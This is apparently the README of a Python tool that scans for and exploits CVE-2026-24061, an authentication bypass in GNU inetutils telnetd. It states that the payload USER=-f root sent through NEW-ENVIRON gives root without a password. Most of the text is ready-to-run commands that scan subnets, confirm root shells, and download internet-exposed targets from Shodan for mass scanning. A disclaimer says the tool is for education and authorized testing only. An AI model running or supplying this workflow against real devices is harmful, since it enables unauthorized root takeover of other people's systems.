
Scans for CVE-2026-24061 telnetd auth bypass, generating payloads and verifying root access on vulnerable GNU inetutils telnetd devices.
⚠️ AVISO LEGAL MUITO IMPORTANTE ⚠️
Esta ferramenta é exclusivamente para fins educacionais, pesquisa de segurança, análise de vulnerabilidades e testes autorizados.
USER=-f root (ou variações) via opção NEW-ENVIRON permite login imediato como root sem senha.Este scanner só foi possível graças à excelente análise técnica e prova de conceito publicada pela equipe da Hakai Security.
O artigo detalhado deles forneceu as bases técnicas precisas sobre o vetor de exploração, os payloads reais e o comportamento do telnetd vulnerável.
→ Leia a análise completa aqui:
https://hakaisecurity.io/cve-2026-24061-execucao-remota-de-codigo-no-telnetd-analise-tecnica-e-prova-de-conceito/research-blog/
Muito obrigado à Hakai Security pela transparência, qualidade técnica e contribuição para a comunidade de segurança. Vocês ajudaram a tornar essa ferramenta mais precisa e útil para pesquisa responsável.
--users (default inclui root, admin, pi, ubuntu, debian, etc.)id e whoami (--verify)-w)# Recomendado: use virtualenv
python3 -m venv venv-cve
source venv-cve/bin/activate
# Instale dependências
pip install telnetlib3 colorama
python3 scan-cve-2026-24061.py 192.168.1.0/24 --verify --banner -w 50
# Com lista de alvos (ex: Shodan)
python3 scan-cve-2026-24061.py alvos.txt -w 80 -t 6 --users root admin -o resultados.json
# Focado em root (mais rápido)
python3 scan-cve-2026-24061.py 10.0.0.0/24 --users root --verify --banner -t 5
# Dry-run (só lista IPs)
python3 scan-cve-2026-24061.py 206.42.41.0/24 --dry-run
pip install shodan
# Inicialize com sua API Key
shodan init SUA_API_KEY_AQUI
# Baixe possíveis alvos
shodan download --limit 500 iot-gnu-telnet.json.gz 'port:23 ("GNU inetutils" OR "telnetd (GNU inetutils)") -ssh'
# Extrai IPs
shodan parse --fields ip_str iot-gnu-telnet.json.gz > alvos.txt
# Scan
python3 scan-cve-2026-24061.py alvos.txt --verify --banner
Pull requests são bem-vindos, desde que mantenham o foco ético e reforcem avisos de responsabilidade. Licença MIT License – mas reforço: o uso não autorizado é de responsabilidade exclusiva do usuário. Feito para estudo, conscientização e pesquisa de segurança.
⭐ Se achou útil, dê uma estrela!
🛡️ Use com extrema responsabilidade.
Made with ❤️ by killsystema